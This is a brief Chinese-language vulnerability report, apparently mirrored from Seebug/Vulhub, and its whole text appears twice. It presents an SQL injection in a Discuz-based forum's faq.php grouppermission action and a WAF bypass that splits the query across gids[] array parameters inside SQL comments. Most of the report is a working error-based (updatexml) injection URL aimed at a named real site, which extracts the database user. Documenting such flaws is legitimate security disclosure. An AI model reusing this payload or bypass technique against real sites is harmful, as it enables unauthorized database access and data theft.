VULHUB ™

### 简要描述： 注入不是亮点，亮点在于绕过waf，专业绕waf，30年。 ### 详细说明： 利用DZ本漏洞的特性，拆开sql语句。 http://bbs.ecshop.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and 1=(updatexml(1,concat(0x5e24,(/* &gids[101][0]=*/select user/* &gids[102][0]=*/()),0x5e24),1))%23 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/030003189508c879fa1d2e2636d541196dad9470.jpg" alt="QQ截图20140703000300.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/030003189508c879fa1d2e2636d541196dad9470.jpg)

### 简要描述： 注入不是亮点，亮点在于绕过waf，专业绕waf，30年。 ### 详细说明： 利用DZ本漏洞的特性，拆开sql语句。 http://bbs.ecshop.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and 1=(updatexml(1,concat(0x5e24,(/* &gids[101][0]=*/select user/* &gids[102][0]=*/()),0x5e24),1))%23 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/030003189508c879fa1d2e2636d541196dad9470.jpg" alt="QQ截图20140703000300.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/030003189508c879fa1d2e2636d541196dad9470.jpg)